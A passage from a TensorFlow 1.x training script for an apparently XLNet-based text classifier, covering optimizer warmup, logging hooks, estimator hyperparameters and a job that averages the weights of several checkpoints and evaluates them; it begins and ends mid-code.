staircase=False,\n name=None\n )\n lr_schedule *= schedule(tf.math.maximum(global_step - params.warmup_steps, 0))\n if params.warmup_steps > 0:\n lr_warmup = learning_rate_warmup(\n global_step,\n warmup_steps=params.warmup_steps, # 35000\n repeat_steps=params.warmup_repeat_steps, # 0\n start=params.warmup_start_lr, # 0.001,\n warmup_schedule=params.warmup_schedule, # 'exp'\n )\n if params.layer_warmup_steps > 0:\n layer_warmup = learning_rate_warmup(\n global_step,\n warmup_steps=params.layer_warmup_steps, # 35000\n repeat_steps=params.warmup_repeat_steps, # 0\n start=params.warmup_start_lr, # 0.001,\n warmup_schedule=params.warmup_schedule, # 'exp'\n )\n # Add learning rate to summary\n lr = params.learning_rate * lr_warmup * lr_schedule\n tf.summary.scalar('learning_rate', lr)\n tf.summary.scalar('layer_schedule', layer_warmup * lr_schedule)\n tf.summary.scalar('lr_schedule', lr_warmup * lr_schedule)\n if params.optimizer == 'bertadam':\n optimizer = AdamWeightDecayOptimizer(\n learning_rate=lr,\n weight_decay_rate=0.01 * lr_warmup * lr_schedule,\n beta_1=0.9,\n beta_2=0.999,\n epsilon=1e-6,\n exclude_from_weight_decay=[\"LayerNorm\", \"layer_norm\", \"/bias\"]\n )\n if params.use_fp16:\n optimizer = tf.train.experimental.enable_mixed_precision_graph_rewrite(optimizer)\n \n # 0 abstract/model/transformer/r_w_bias:0' shape=(24, 16, 64)\n # 1 abstract/model/transformer/r_r_bias:0' shape=(24, 16, 64)\n # 2 abstract/model/transformer/word_embedding/lookup_table:0' shape=(32000, 1024)\n # 3 abstract/model/transformer/r_s_bias:0' shape=(24, 16, 64)\n # 4 abstract/model/transformer/seg_embed:0' shape=(24, 2, 16, 64)\n # 5 abstract/model/transformer/layer_0/rel_attn/q/kernel:0' shape=(1024, 16, 64)\n # 6 abstract/model/transformer/layer_0/rel_attn/k/kernel:0' shape=(1024, 16, 64)\n # 7 abstract/model/transformer/layer_0/rel_attn/v/kernel:0' shape=(1024, 16, 64)\n # 8 abstract/model/transformer/layer_0/rel_attn/r/kernel:0' shape=(1024, 16, 64)\n # 9 abstract/model/transformer/layer_0/rel_attn/o/kernel:0' shape=(1024, 16, 64)\n tvars = tf.trainable_variables()\n if params.train_seg_embed:\n tvars = tvars[4:5] + tvars[5 + params.freeze_layers * 13:]\n else:\n tvars = tvars[5 + params.freeze_layers * 13:]\n grads_and_vars = optimizer.compute_gradients(loss, tvars)\n grads_and_vars = [(g,v) for g,v in grads_and_vars if g is not None]\n grads, tvars = list(zip(*grads_and_vars))\n for i in range(7):\n print(i, '=======', tvars[i], '======')\n # This is how the model was pre-trained.\n (grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)\n\n if params.layer_decay_rate != 1.0:\n n_layer = xlnet_config.n_layer\n for i in range(len(grads)):\n for l in range(n_layer):\n prefix = f'abstract/model/transformer/layer_{l}/'\n if tvars[i].name[:len(prefix)] == prefix:\n abs_rate = params.layer_decay_rate ** (n_layer - 1 - l)\n grads[i] *= abs_rate * layer_warmup\n # tf.logging.info(\"Apply mult {:.4f} to layer-{} grad of {}\".format(rate, l, tvars[i].name))\n break\n \n train_op = optimizer.apply_gradients(\n zip(grads, tvars), global_step=global_step\n )\n # Normally the global step update is done inside of `apply_gradients`.\n # However, `AdamWeightDecayOptimizer` doesn't do this. But if you use\n # a different optimizer, you should probably take this line out.\n new_global_step = global_step + 1\n train_op = tf.group(train_op, [global_step.assign(new_global_step)])\n else:\n # update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n # with tf.control_dependencies(update_ops):\n train_op = tf.contrib.layers.optimize_loss(\n loss=loss,\n global_step=global_step,\n learning_rate=lr, # 0.001\n optimizer=optimizers[params.optimizer.lower()],\n gradient_noise_scale=None,\n gradient_multipliers=None,\n # some gradient clipping stabilizes training in the beginning.\n # clip_gradients=clip_gradients,\n # clip_gradients=6.,\n # clip_gradients=None,\n # learning_rate_decay_fn=learning_rate_decay_fn,\n update_ops=None,\n variables=None,\n name=None,\n summaries=[\n # 'gradients',\n # 'gradient_norm',\n 'loss',\n # 'learning_rate' # only added if learning_rate_decay_fn is not None\n ],\n colocate_gradients_with_ops=True,\n increment_global_step=True\n )\n\n group_inputs = [train_op]\n\n # runtime numerical checks\n if params.check_nans:\n checks = tf.add_check_numerics_ops()\n group_inputs = [checks]\n\n # update accuracy\n # group_inputs.append(metrics['accuracy'][1])\n\n # record total number of examples processed\n examples_processed = tf.get_variable(\n name='examples_processed',\n initializer=tf.cast(0, tf.int64),\n trainable=False,\n dtype=tf.int64,\n aggregation=tf.VariableAggregation.SUM\n )\n # print('examples_processed', examples_processed)\n group_inputs.append(\n tf.assign_add(\n examples_processed,\n tf.cast(batch_size, tf.int64),\n name='update_examples_processed'\n )\n )\n epoch = examples_processed // seq_total\n group_inputs.append(epoch)\n progress = examples_processed / seq_total - tf.cast(epoch, tf.float64)\n group_inputs.append(progress)\n\n train_op = tf.group(*group_inputs)\n\n # if params.debug:\n # train_op = tf.cond(\n # pred=tf.logical_or(\n # tf.is_nan(tf.reduce_max(embeddings)),\n # tf.equal(global_step, 193000)\n # ),\n # false_fn=lambda: train_op,\n # true_fn=lambda: tf.Print(\n # train_op,\n # # data=[global_step, metrics['accuracy'][0], lengths, loss, losses, predictions['classes'], labels, mask, protein, embeddings],\n # data=[global_step, batch_accuracy, lengths, loss, embeddings],\n # message='## DEBUG LOSS: ',\n # summarize=50000\n # )\n # )\n\n training_hooks = []\n # INFO:tensorflow:global_step/sec: 2.07549\n training_hooks.append(\n tf.train.StepCounterHook(\n output_dir=params.model_dir,\n every_n_steps=params.log_step_count_steps\n )\n )\n\n # INFO:tensorflow:accuracy = 0.16705106, examples = 15000, loss = 9.688441, step = 150 (24.091 sec)\n def logging_formatter(v):\n return 'TP:\\033[1;32m {:5.0f}\\033[0m, precision:\\033[1;32m {:9.5%}\\033[0m, recall:\\033[1;32m {:9.5%}\\033[0m, f1:\\033[1;32m {:9.5%}\\033[0m, accuracy:\\033[1;32m {:9.5%}\\033[0m, loss:\\033[1;32m {:8.5f}\\033[0m, lr:\\033[1;32m {:8.5f}\\033[0m, step:\\033[1;32m {:7,d}\\033[0m'.format(\n v['TP'], v['precision'], v['recall'], v['f1'], v['accuracy'],\n v['loss'], v['learning_rate'], v['step']\n )\n\n tensors = {\n 'TP': TP,\n 'precision': batch_precision,\n 'recall': batch_recall,\n 'f1': batch_f1,\n 'accuracy': batch_accuracy,\n 'loss': loss,\n 'step': global_step,\n 'learning_rate': lr\n # 'input_size': tf.shape(protein),\n # 'examples': examples_processed\n }\n # def logging_formatter(v):\n # return 'TP:\\033[1;32m {:5.0f}\\033[0m, precision:\\033[1;32m {:6.2%}/{:6.2%}\\033[0m, recall:\\033[1;32m {:6.2%}/{:6.2%}\\033[0m, f1:\\033[1;32m {:6.2%}/{:6.2%}\\033[0m, accuracy:\\033[1;32m {:6.2%}/{:6.2%}\\033[0m, loss:\\033[1;32m {:8.5f}\\033[0m, lr:\\033[1;32m {:10.8f}\\033[0m, step:\\033[1;32m {:6,d}\\033[0m'.format(\n # v['TP'], v['precision'], v['precision_article'], v['recall'], v['recall_article'], v['f1'], v['f1_article'], v['accuracy'], v['accuracy_article'],\n # v['loss'], v['learning_rate'], v['step']\n # )\n \n # tensors = {\n # 'TP': TP,\n # 'precision': batch_precision,\n # 'recall': batch_recall,\n # 'f1': batch_f1,\n # 'accuracy': batch_accuracy,\n # 'precision_article': batch_precision_article,\n # 'recall_article': batch_recall_article,\n # 'f1_article': batch_f1_article,\n # 'accuracy_article': batch_accuracy_article,\n # 'loss': loss,\n # 'step': global_step,\n # 'learning_rate': lr\n # # 'input_size': tf.shape(protein),\n # # 'examples': examples_processed\n # }\n # if is_train:\n # tensors['epoch'] = epoch\n # tensors['progress'] = progress\n\n training_hooks.append(\n ColoredLoggingTensorHook(\n tensors=tensors,\n every_n_iter=params.log_step_count_steps,\n at_end=False,\n formatter=logging_formatter\n )\n )\n training_hooks.append(\n EpochProgressBarHook(\n total=seq_total,\n initial_tensor=examples_processed,\n n_tensor=batch_size,\n postfix_tensors=None,\n every_n_iter=params.log_step_count_steps\n )\n )\n if params.trace:\n training_hooks.append(\n tf.train.ProfilerHook(\n save_steps=params.save_summary_steps,\n output_dir=params.model_dir,\n show_dataflow=True,\n show_memory=True\n )\n )\n training_hooks.append(\n EpochCheckpointInputPipelineHook(\n checkpoint_dir=params.model_dir,\n config=config,\n save_secs=None, # 10m\n # save_secs=params.save_checkpoints_secs, # 10m\n save_steps=params.save_checkpoints_steps,\n # save_steps=None,\n )\n )\n\n training_chief_hooks = []\n # # saving_listeners like _NewCheckpointListenerForEvaluate\n # # will be called on the first CheckpointSaverHook\n # training_chief_hooks.append(tf.train.CheckpointSaverHook(\n # checkpoint_dir=params.model_dir,\n # # effectively only save on start and end of MonitoredTrainingSession\n # save_secs=30 * 24 * 60 * 60,\n # save_steps=None,\n # checkpoint_basename=\"model.epoch\",\n # saver=tf.train.Saver(\n # sharded=False,\n # max_to_keep=0,\n # defer_build=False,\n # save_relative_paths=True\n # )\n # ))\n # # Add a second CheckpointSaverHook to save every save_checkpoints_secs\n # training_chief_hooks.append(tf.train.CheckpointSaverHook(\n # checkpoint_dir=params.model_dir,\n # save_secs=params.save_checkpoints_secs, # 10m\n # save_steps=None,\n # checkpoint_basename=\"model.step\",\n # scaffold=scaffold\n # ))\n training_chief_hooks.append(\n EpochCheckpointSaverHook(\n checkpoint_dir=params.model_dir,\n epoch_tensor=epoch,\n save_secs=None, # 10m\n # save_secs=params.save_checkpoints_secs, # 10m\n save_steps=params.save_checkpoints_steps,\n # save_steps=None,\n scaffold=scaffold\n )\n )\n\n # local training:\n # all_hooks=[\n # EpochCheckpointSaverHook, Added into training_chief_hooks in this model_fn\n # SummarySaverHook, # Added into chief_hooks in MonitoredTrainingSession()\n # _DatasetInitializerHook, # Added into worker_hooks in Estimator._train_model_default\n # NanTensorHook, # Added into worker_hooks in Estimator._train_with_estimator_spec\n # StepCounterHook, # Added into training_hooks in this model_fn\n # LoggingTensorHook, # Added into training_hooks in this model_fn\n # EpochCheckpointInputPipelineHook # Added into training_hooks in this model_fn\n # ]\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions, # PREDICT\n loss=loss, # EVAL, TRAIN\n train_op=train_op, # TRAIN\n scaffold=scaffold,\n training_chief_hooks=training_chief_hooks,\n training_hooks=training_hooks\n )\n\n\n# https://github.com/tensorflow/models/blob/69cf6fca2106c41946a3c395126bdd6994d36e6b/tutorials/rnn/quickdraw/train_model.py\n\n\ndef create_estimator_and_specs(run_config):\n \"\"\"Creates an Estimator, TrainSpec and EvalSpec.\"\"\"\n\n # build hyperparameters\n model_params = tf.contrib.training.HParams(\n command=FLAGS.command,\n model_dir=run_config.model_dir,\n model_dir_prefix=FLAGS.model_dir_prefix,\n tfrecord_pattern={\n tf.estimator.ModeKeys.TRAIN: FLAGS.training_data,\n tf.estimator.ModeKeys.EVAL: FLAGS.eval_data,\n tf.estimator.ModeKeys.PREDICT: FLAGS.predict_data\n },\n data_version=FLAGS.data_version,\n metadata_path=FLAGS.metadata_path,\n max_sentences=FLAGS.max_sentences,\n experiment_name=FLAGS.experiment_name,\n host_script_name=FLAGS.host_script_name,\n job=FLAGS.job,\n max_epochs=FLAGS.max_epochs,\n max_runs=FLAGS.max_runs,\n eval_predict_checkpoint=FLAGS.eval_predict_checkpoint,\n predict_prefix=FLAGS.predict_prefix,\n article_predict_prefix=FLAGS.article_predict_prefix,\n predict_sample_submission=FLAGS.predict_sample_submission,\n predict_sample_submission_article=FLAGS.predict_sample_submission_article,\n predict_threshold=FLAGS.predict_threshold,\n article_predict_threshold=FLAGS.article_predict_threshold,\n eval_dir=FLAGS.eval_dir,\n eval_prefix=FLAGS.eval_prefix,\n eval_format=FLAGS.eval_format,\n eval_level=FLAGS.eval_level,\n eval_precision_recall_at_equal_thresholds=FLAGS.\n eval_precision_recall_at_equal_thresholds,\n predict_top_k=FLAGS.predict_top_k,\n num_gpus=FLAGS.num_gpus,\n num_cpu_threads=FLAGS.num_cpu_threads,\n random_seed=FLAGS.random_seed,\n use_xla=FLAGS.use_xla,\n use_fp16=FLAGS.use_fp16,\n use_tensor_ops=FLAGS.use_tensor_ops,\n save_summary_steps=FLAGS.save_summary_steps,\n save_checkpoints_steps=FLAGS.save_checkpoints_steps,\n save_checkpoints_secs=FLAGS.save_checkpoints_secs,\n keep_checkpoint_max=FLAGS.keep_checkpoint_max,\n keep_checkpoint_every_n_hours=FLAGS.keep_checkpoint_every_n_hours,\n log_step_count_steps=FLAGS.log_step_count_steps,\n eval_delay_secs=FLAGS.eval_delay_secs,\n eval_throttle_secs=FLAGS.eval_throttle_secs,\n steps=FLAGS.steps,\n eval_steps=FLAGS.eval_steps,\n dataset_buffer=FLAGS.dataset_buffer, # 256 MB\n dataset_parallel_reads=FLAGS.dataset_parallel_reads, # 1\n shuffle_buffer=FLAGS.shuffle_buffer, # 16 * 1024 examples\n repeat_count=FLAGS.repeat_count, # -1 = Repeat the input indefinitely.\n batch_size=FLAGS.batch_size,\n predict_batch_size=FLAGS.predict_batch_size,\n max_batch_size=FLAGS.max_batch_size,\n prefetch_buffer=FLAGS.prefetch_buffer, # batches\n dense_catagorical_fields=FLAGS.dense_catagorical_fields, # [None]\n conv_catagorical_fields=FLAGS.conv_catagorical_fields, # [0,1,2,3,4]\n sent_conv_catagorical_fields=FLAGS.\n sent_conv_catagorical_fields, # [0,1,2,3,4]\n segment_id_input=FLAGS.segment_id_input, # [None]\n # hub_model=FLAGS.hub_model, #\n init_checkpoint_root=FLAGS.init_checkpoint_root, # \n ckpt_name=FLAGS.ckpt_name, # \n title_init_checkpoint_root=FLAGS.title_init_checkpoint_root, # \n title_ckpt_name=FLAGS.title_ckpt_name, # \n title_dense_units=FLAGS.title_dense_units, # 64\n authors_embed_dim=FLAGS.authors_embed_dim, # 64\n authors_rnn_units=FLAGS.authors_rnn_units, # 64\n categories_embed_dim=FLAGS.categories_embed_dim, # 256\n categories_rnn_units=FLAGS.categories_rnn_units, # 256\n fields_embed_dim=FLAGS.fields_embed_dim, # 16\n fields_rnn_units=FLAGS.fields_rnn_units, # 16\n input_norm=FLAGS.input_norm, # 16\n rnn_norm=FLAGS.rnn_norm, # 16\n dense_norm=FLAGS.dense_norm, # 16\n embed_dim=FLAGS.embed_dim, # 32\n use_xlnet_zero_seg_ids=FLAGS.use_xlnet_zero_seg_ids, # 0.1\n xlnet_dropout=FLAGS.xlnet_dropout, # 0.1\n embedded_dropout=FLAGS.embedded_dropout, # 0.2\n feature_dropout=FLAGS.feature_dropout, # 0.2\n conv_bank_size=FLAGS.conv_bank_size, # 32\n conv_filters=FLAGS.conv_filters, # 32\n conv_kernel_size=FLAGS.conv_kernel_size, # 7\n conv_strides=FLAGS.conv_strides, # 1\n conv_dropout=FLAGS.conv_dropout, # 0.2\n use_conv_batch_norm=FLAGS.use_conv_batch_norm,\n use_conv_residual=FLAGS.use_conv_residual,\n use_rnn_residual=FLAGS.use_rnn_residual,\n use_dense_residual=FLAGS.use_dense_residual,\n use_conv_highway=FLAGS.use_conv_highway,\n conv_highway_depth=FLAGS.conv_highway_depth,\n conv_highway_units=FLAGS.conv_highway_units,\n rnn_cell_type=FLAGS.rnn_cell_type,\n rnn_num_units=FLAGS.rnn_num_units, # list\n rnn_dropout=FLAGS.rnn_dropout,\n rnn_recurrent_dropout=FLAGS.rnn_recurrent_dropout,\n dense_units=FLAGS.dense_units,\n dense_dropout=FLAGS.dense_dropout,\n attend_to=FLAGS.attend_to, # 12\n word_num_layers=FLAGS.word_num_layers, # 12\n word_d_model=FLAGS.word_d_model, # 768\n word_dff_x=FLAGS.word_dff_x, # 4\n word_dropout_rate=FLAGS.word_dropout_rate, # 0.1\n sent_num_layers=FLAGS.sent_num_layers, # 12\n sent_d_model=FLAGS.sent_d_model, # 768\n sent_dff_x=FLAGS.sent_dff_x, # 4\n sent_dropout_rate=FLAGS.sent_dropout_rate, # 0.1\n use_transformer_positional_encoding=FLAGS.\n use_transformer_positional_encoding, # 3072\n sent_pool_abstract_features=FLAGS.sent_pool_abstract_features,\n sent_conv_bank_size=FLAGS.sent_conv_bank_size,\n sent_rnn_cell_type=FLAGS.sent_rnn_cell_type,\n sent_rnn_num_units=FLAGS.sent_rnn_num_units,\n sent_dense_units=FLAGS.sent_dense_units,\n arti_dense_units=FLAGS.arti_dense_units,\n use_crf=FLAGS.use_crf, # True\n use_batch_renorm=FLAGS.use_batch_renorm,\n loss_type=FLAGS.loss_type,\n scale_label=FLAGS.scale_label,\n loss_pos_weight=FLAGS.loss_pos_weight,\n article_loss_pos_weight=FLAGS.article_loss_pos_weight,\n num_classes=FLAGS.num_classes,\n clip_gradients_std_factor=FLAGS.clip_gradients_std_factor, # 2.\n clip_gradients_decay=FLAGS.clip_gradients_decay, # 0.95\n # 6.\n clip_gradients_static_max_norm=FLAGS.clip_gradients_static_max_norm,\n no_bert_training_steps=FLAGS.no_bert_training_steps, # 224\n learning_rate_decay_fn=FLAGS.learning_rate_decay_fn,\n learning_rate_decay_steps=FLAGS.learning_rate_decay_steps, # 2000\n learning_rate_decay_rate=FLAGS.learning_rate_decay_rate, # 0.7\n train_seg_embed=FLAGS.train_seg_embed, # False\n freeze_layers=FLAGS.freeze_layers, # 12\n layer_decay_rate=FLAGS.layer_decay_rate, # 1.0\n layer_warmup_steps=FLAGS.layer_warmup_steps, # 2000\n learning_rate=FLAGS.learning_rate, # 0.001\n warmup_steps=FLAGS.warmup_steps, # 35000 (10% epoch)\n warmup_repeat_steps=FLAGS.warmup_repeat_steps, # 0\n warmup_start_lr=FLAGS.warmup_start_lr, # 0.001\n warmup_schedule=FLAGS.warmup_schedule, # exp\n optimizer=FLAGS.optimizer,\n adam_epsilon=FLAGS.adam_epsilon,\n check_nans=FLAGS.check_nans,\n trace=FLAGS.trace,\n debug=FLAGS.debug,\n metadata=FLAGS.metadata\n )\n\n # hook = tf_debug.LocalCLIDebugHook()\n\n estimator = tf.estimator.Estimator(\n model_fn=model_fn, config=run_config, params=model_params\n )\n\n # save model_params to model_dir/hparams.json\n hparams_path = Path(\n estimator.model_dir,\n 'hparams-{:%Y-%m-%d-%H-%M-%S}.json'.format(datetime.datetime.now())\n )\n hparams_path.parent.mkdir(parents=True, exist_ok=True) # pylint: disable=no-member\n hparams_path.write_text(model_params.to_json(indent=2, sort_keys=False))\n\n train_spec = tf.estimator.TrainSpec(\n input_fn=input_fn,\n # A function that provides input data for training as minibatches.\n # max_steps=FLAGS.steps or None, # 0\n max_steps=None,\n # Positive number of total steps for which to train model. If None, train forever.\n hooks=None\n # passed into estimator.train(hooks)\n # and then into _train_with_estimator_spec(hooks)\n # Iterable of `tf.train.SessionRunHook` objects to run\n # on all workers (including chief) during training.\n # CheckpointSaverHook? Not here, need only to run on cchief, put in\n # estimator_spec.training_chief_hooks\n )\n\n eval_spec = tf.estimator.EvalSpec(\n input_fn=input_fn,\n # A function that constructs the input data for evaluation.\n steps=FLAGS.eval_steps, # 10\n # Positive number of steps for which to evaluate model. If\n # `None`, evaluates until `input_fn` raises an end-of-input exception.\n name=None,\n # Name of the evaluation if user needs to run multiple\n # evaluations on different data sets. Metrics for different evaluations\n # are saved in separate folders, and appear separately in tensorboard.\n hooks=None,\n # Iterable of `tf.train.SessionRunHook` objects to run\n # during evaluation.\n exporters=None,\n # Iterable of `Exporter`s, or a single one, or `None`.\n # `exporters` will be invoked after each evaluation.\n start_delay_secs=10,\n # start_delay_secs=FLAGS.eval_delay_secs, # 30 * 24 * 60 * 60\n # used for distributed training continuous evaluator only\n # Int. Start evaluating after waiting for this many seconds.\n throttle_secs=10\n # throttle_secs=FLAGS.eval_throttle_secs # 30 * 24 * 60 * 60\n # full dataset at batch=4 currently needs 15 days\n # adds a StopAtSecsHook(eval_spec.throttle_secs)\n # Do not re-evaluate unless the last evaluation was\n # started at least this many seconds ago. Of course, evaluation does not\n # occur if no new checkpoints are available, hence, this is the minimum.\n )\n\n return estimator, train_spec, eval_spec\n\n\ndef main(unused_args):\n # setup colored logger\n coloredlogs.DEFAULT_FIELD_STYLES = dict(\n asctime=dict(color='green'),\n hostname=dict(color='magenta', bold=True),\n levelname=dict(color='black', bold=True),\n programname=dict(color='cyan', bold=True),\n name=dict(color='blue')\n )\n coloredlogs.DEFAULT_LEVEL_STYLES = dict(\n spam=dict(color='green', faint=True),\n debug=dict(color='green'),\n verbose=dict(color='blue'),\n info=dict(),\n notice=dict(color='magenta'),\n warning=dict(color='yellow'),\n success=dict(color='green', bold=True),\n error=dict(color='red'),\n critical=dict(color='red', bold=True)\n )\n\n if tfversion[0] == 1 and tfversion[1] <= 11:\n logger = tf_logging._get_logger() # 1.11\n else:\n # >>> logging.getLogger().handlers\n # [<ABSLHandler (NOTSET)>]\n # >>> logger = tf.get_logger()\n # >>> logger.handlers\n # []\n logger = tf.get_logger() # 1.12 # pylint: disable=no-member\n if len(logging.getLogger().handlers) != 0:\n # Remove ABSLHandler\n logging.getLogger().handlers.pop()\n if len(logger.handlers) == 0:\n # Add our own handler\n _handler = logging.StreamHandler(sys.stderr)\n _handler.setFormatter(logging.Formatter(logging.BASIC_FORMAT, None))\n logger.addHandler(_handler)\n\n # print(Fore.RED + 'some red text' + Style.RESET_ALL, file=logger.handlers[0].stream)\n\n # set logger.handler.stream to output to our TqdmFile\n for h in logger.handlers:\n # <StreamHandler <stderr> (NOTSET)>\n # <StandardErrorHandler <stderr> (DEBUG)>\n # print(h)\n h.acquire()\n try:\n h.flush()\n orig_stdout = h.stream\n h.stream = TqdmFile(file=h.stream)\n finally:\n h.release()\n\n tf.logging.set_verbosity(tf.logging.DEBUG)\n tf.logging.debug('DEBUG==========test==========DEBUG')\n\n # check tfrecords data exists\n if FLAGS.job == 'train' and len(glob.glob(FLAGS.training_data)) == 0:\n msg = 'No training data files found for pattern: {}'.format(\n FLAGS.training_data\n )\n tf.logging.fatal(msg)\n raise IOError(msg)\n if FLAGS.job in {'eval', 'train'} and len(glob.glob(FLAGS.eval_data)) == 0:\n msg = 'No evaluation data files found for pattern: {}'.format(\n FLAGS.eval_data\n )\n tf.logging.fatal(msg)\n raise IOError(msg)\n if FLAGS.job == 'predict' and len(glob.glob(FLAGS.predict_data)) == 0:\n msg = 'No predict data files found for pattern: {}'.format(\n FLAGS.predict_data\n )\n tf.logging.fatal(msg)\n raise IOError(msg)\n if len(glob.glob(FLAGS.metadata_path)) == 0:\n msg = 'No metadata file found for pattern: {}'.format(\n FLAGS.metadata_path\n )\n tf.logging.fatal(msg)\n raise IOError(msg)\n\n # parse metadata\n FLAGS.metadata = None\n with open(FLAGS.metadata_path) as f:\n FLAGS.metadata = json.load(f)\n\n # read num_classes from metadata\n if not FLAGS.num_classes or FLAGS.num_classes < 1:\n # 35 for seq2seq, 33 for multilabel\n FLAGS.num_classes = len(FLAGS.metadata['task1_categories'])\n\n # set predict_top_k to num_classes if the given value doesn't make sense\n if not FLAGS.predict_top_k or FLAGS.predict_top_k < 1 or FLAGS.predict_top_k > FLAGS.num_classes:\n FLAGS.predict_top_k = FLAGS.num_classes\n\n # Hardware info\n FLAGS.num_gpus = FLAGS.num_gpus or tf.contrib.eager.num_gpus()\n FLAGS.num_cpu_threads = FLAGS.num_cpu_threads or os.cpu_count()\n\n # multi gpu distribution strategy\n distribution = None\n if FLAGS.num_gpus > 1:\n distribution = tf.contrib.distribute.MirroredStrategy(\n num_gpus=FLAGS.num_gpus\n )\n tf.logging.info('MirroredStrategy num_gpus: {}'.format(FLAGS.num_gpus))\n\n if FLAGS.eval_steps == -1:\n FLAGS.eval_steps = None\n\n # Set the seeds\n if FLAGS.random_seed == -1:\n FLAGS.random_seed = None\n else:\n np.random.seed(FLAGS.random_seed)\n if tfversion[0] == 1 and tfversion[1] <= 13:\n tf.set_random_seed(FLAGS.random_seed)\n else:\n tf.random.set_random_seed(FLAGS.random_seed)\n\n # Use JIT XLA\n # session_config = tf.ConfigProto(log_device_placement=True)\n session_config = tf.ConfigProto(allow_soft_placement=True)\n # default session config when init Estimator\n session_config.graph_options.rewrite_options.meta_optimizer_iterations = rewriter_config_pb2.RewriterConfig.ONE # pylint: disable=no-member\n if FLAGS.use_xla:\n session_config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1 # pylint: disable=no-member\n # session_config.graph_options.rewrite_options.memory_optimization = rewriter_config_pb2.RewriterConfig.NO_MEM_OPT\n\n if FLAGS.job == 'crossover':\n checkpoints = [c.strip() for c in FLAGS.crossover_checkpoints.split(',')]\n checkpoints = [c for c in checkpoints if c]\n num_chk = len(checkpoints)\n assert num_chk > 1, f'Provice 2 or more checkpoints to --crossover_checkpoints, {checkpoints}'\n crossover_meta = {\n 'checkpoints': checkpoints,\n 'best_threshold_f1': {}\n }\n var_shapes = tf.train.list_variables(checkpoints[0])\n var_dtypes = {}\n var_values = defaultdict(list)\n global_steps = []\n for checkpoint in checkpoints:\n tf.logging.info(\"Read from checkpoint %s\", checkpoint)\n reader = tf.train.load_checkpoint(checkpoint)\n with tqdm(\n total=len(var_shapes),\n unit='vars',\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc='read'\n ) as t:\n for (name, _) in var_shapes:\n t.update()\n if reader.has_tensor(name):\n tensor = reader.get_tensor(name)\n if name == 'global_step':\n global_steps.append(tensor)\n else:\n var_dtypes[name] = tensor.dtype\n var_values[name].append(tensor)\n del var_shapes\n # build crossover values\n print(f'build crossover weights: {len(var_values)}')\n crossover_weights = defaultdict(dict)\n with tqdm(\n total=len(var_values),\n unit='vars',\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc='weights'\n ) as t:\n for name, values in var_values.items():\n t.update()\n if num_chk == 2:\n w = FLAGS.crossover_weights\n for i in np.arange(w[0], w[1], w[2]):\n j = 100 - i\n crossover_weights[f'{j:05.2f}-{i:05.2f}'] = [j,i]\n elif num_chk == 3:\n # [[1, 1, 8], [1, 2, 7], [1, 3, 6], [1, 1, 1]]\n i = 939.9\n j = 60.1\n for k in np.arange(250, 110, -10):\n crossover_weights[f'{i/10:05.2f}-{j/10:05.2f}-{k/10:05.2f}'] = [i,j,k]\n else:\n crossover_weights['avg'] = None\n # crossover_values = defaultdict(dict)\n # with tqdm(\n # total=len(var_values),\n # unit='vars',\n # dynamic_ncols=True,\n # ascii=True,\n # smoothing=0.1,\n # desc='build'\n # ) as t:\n # for name, values in var_values.items():\n # t.update()\n # # crossover_values['min'][name] = np.min(values, axis=0)\n # # crossover_values['max'][name] = np.max(values, axis=0)\n # if num_chk == 2:\n # w = FLAGS.crossover_weights\n # for i in np.arange(w[0], w[1], w[2]):\n # j = 100 - i\n # if name[:9] == 'optimizer':\n # v = np.average(values, axis=0)\n # else:\n # v = np.average(values, axis=0, weights=[j,i])\n # crossover_values[f'{j:.2f}-{i:.2f}'][name] = v\n # elif num_chk == 3:\n # # [[1, 1, 8], [1, 2, 7], [1, 3, 6], [1, 1, 1]]\n # i = 939.9\n # j = 60.1\n # for k in np.arange(250, 110, -10):\n # if name[:9] == 'optimizer':\n # v = np.average(values, axis=0)\n # else:\n # v = np.average(values, axis=0, weights=[i,j,k])\n # crossover_values[f'{i/10:.2f}-{j/10:.2f}-{k/10:.2f}'][name] = v\n # # w = FLAGS.crossover_weights\n # # for w in FLAGS.crossover_weights:\n # # for weights in sorted(set(list(itertools.permutations(w))), reverse=True):\n # # if name[:9] == 'optimizer':\n # # v = np.average(values, axis=0)\n # # else:\n # # v = np.average(values, axis=0, weights=weights)\n # # crossover_values['-'.join([str(s) for s in weights])][name] = v\n # else:\n # crossover_values['avg'][name] = np.average(values, axis=0)\n \n # prep variables\n print('prep variables')\n with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):\n tf_vars = [\n tf.get_variable(name, shape=var_values[name][0].shape, dtype=var_dtypes[name])\n for name in var_values\n ]\n del var_dtypes\n placeholders = [tf.placeholder(v.dtype, shape=v.shape) for v in tf_vars]\n assign_ops = [tf.assign(v, p) for (v, p) in zip(tf_vars, placeholders)]\n global_step = tf.Variable(max(global_steps), name=\"global_step\", trainable=False, dtype=tf.int64)\n saver = tf.train.Saver(tf.all_variables(), max_to_keep=9999)\n \n # save crossover checkpoint and evaluate\n print('save crossover checkpoint and evaluate')\n crossover_output_prefix = verify_output_path(FLAGS.crossover_output_prefix)\n # for method, values in crossover_values.items():\n for method, weights in crossover_weights.items():\n crossover_values = {}\n with tqdm(\n total=len(var_values),\n unit='vars',\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc=f'build-{method}'\n ) as t:\n for name, values in var_values.items():\n t.update()\n if name[:9] == 'optimizer':\n v = np.average(values, axis=0)\n else:\n v = np.average(values, axis=0, weights=weights)\n crossover_values[name] = v\n print(f'=== saving {method} ===')\n crossover_checkpoint = verify_output_path(crossover_output_prefix / method / method)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for p, assign_op, value in zip(placeholders, assign_ops, crossover_values.values()):\n sess.run(assign_op, {p: value})\n # Use the built saver to save the averaged checkpoint.\n saver.save(sess, str(crossover_checkpoint))\n del crossover_values\n # evaluate\n model_dir = str(crossover_checkpoint.parent)\n print(f'=== evaluate {method}: {model_dir} ===')\n estimator, train_spec, eval_spec = create_estimator_and_specs(\n run_config=tf.estimator.RunConfig(\n model_dir=model_dir,\n tf_random_seed=FLAGS.random_seed,\n save_summary_steps=None,\n save_checkpoints_steps=None,\n save_checkpoints_secs=None,\n keep_checkpoint_max=9999,\n log_step_count_steps=None,\n session_config=session_config\n )\n )\n eval_result_metrics = estimator.evaluate(\n 